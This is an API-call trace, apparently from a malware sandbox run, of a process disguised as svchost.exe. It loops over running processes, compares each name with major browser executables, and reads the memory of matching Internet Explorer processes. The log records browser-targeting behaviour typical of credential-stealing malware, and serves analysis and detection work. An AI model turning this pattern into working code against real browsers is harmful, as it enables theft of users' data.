	[0198.946] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.946] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0198.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.947] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.947] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0198.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x17c4
	[0198.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.948] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0198.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.948] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.949] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0198.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.949] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.949] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0198.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x17c8
	[0198.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.950] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0198.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.950] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.951] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0198.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.952] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.952] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0198.953] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x17cc
	[0198.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.953] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0198.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.953] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.953] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0198.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.953] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.954] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0198.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x17d0
	[0198.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.954] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0198.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.955] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.955] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0198.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.956] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.956] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0198.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x17d4
	[0198.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.957] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0198.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.957] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.958] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0198.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.959] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.959] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0198.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x17d8
	[0198.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.960] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0198.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.960] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.960] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0198.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.961] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.961] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0198.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x17dc
	[0198.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.962] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0198.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.962] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.962] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0198.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.962] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.963] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0198.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x17e0
	[0198.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.963] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0198.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.964] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.964] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0198.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.965] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.965] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0198.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x17e4
	[0198.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.966] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0198.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.966] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.967] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0198.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.968] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.968] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0198.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x17e8
	[0198.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.969] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0198.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.969] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.970] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0198.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.970] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.970] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0198.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x17ec
	[0198.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.971] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0198.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.972] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.972] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0198.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.973] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0198.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x17f0
	[0198.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.974] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0198.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.975] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.975] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0198.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.976] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0198.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x17f4
	[0198.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.977] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0198.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.977] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0198.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.978] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0198.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.979] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.979] NtQueryInformationProcess (in: ProcessHandle=0x17f4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0198.979] ReadProcessMemory (in: hProcess=0x17f4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0198.979] ReadProcessMemory (in: hProcess=0x17f4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0198.979] ReadProcessMemory (in: hProcess=0x17f4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0198.979] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0198.979] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0198.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x17f8
	[0198.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.980] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0198.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.980] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0198.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.981] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0198.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.981] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.981] NtQueryInformationProcess (in: ProcessHandle=0x17f8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0198.981] ReadProcessMemory (in: hProcess=0x17f8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0198.981] ReadProcessMemory (in: hProcess=0x17f8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0198.981] ReadProcessMemory (in: hProcess=0x17f8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0198.981] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0198.982] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0198.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x17fc
	[0198.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.982] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0198.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.983] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.983] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0198.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.983] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.983] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0198.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1804
	[0198.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.984] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0198.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.985] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.985] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0198.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.985] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.985] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1808
	[0198.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.986] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.987] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.987] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.987] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.987] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.988] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0198.989] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x180c
	[0198.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.989] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.989] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.989] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.990] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.990] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1810
	[0198.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.991] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.991] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.991] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.992] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.992] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0198.992] CloseHandle (hObject=0x188) returned 1
	[0198.992] Sleep (dwMilliseconds=0x64) 
	[0199.088] GetCurrentProcessId () returned 0x110
	[0199.088] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0199.091] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0199.092] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0199.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0199.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1814
	[0199.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.095] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.095] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.095] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.096] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.096] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0199.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1818
	[0199.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.097] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.098] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.098] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.099] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
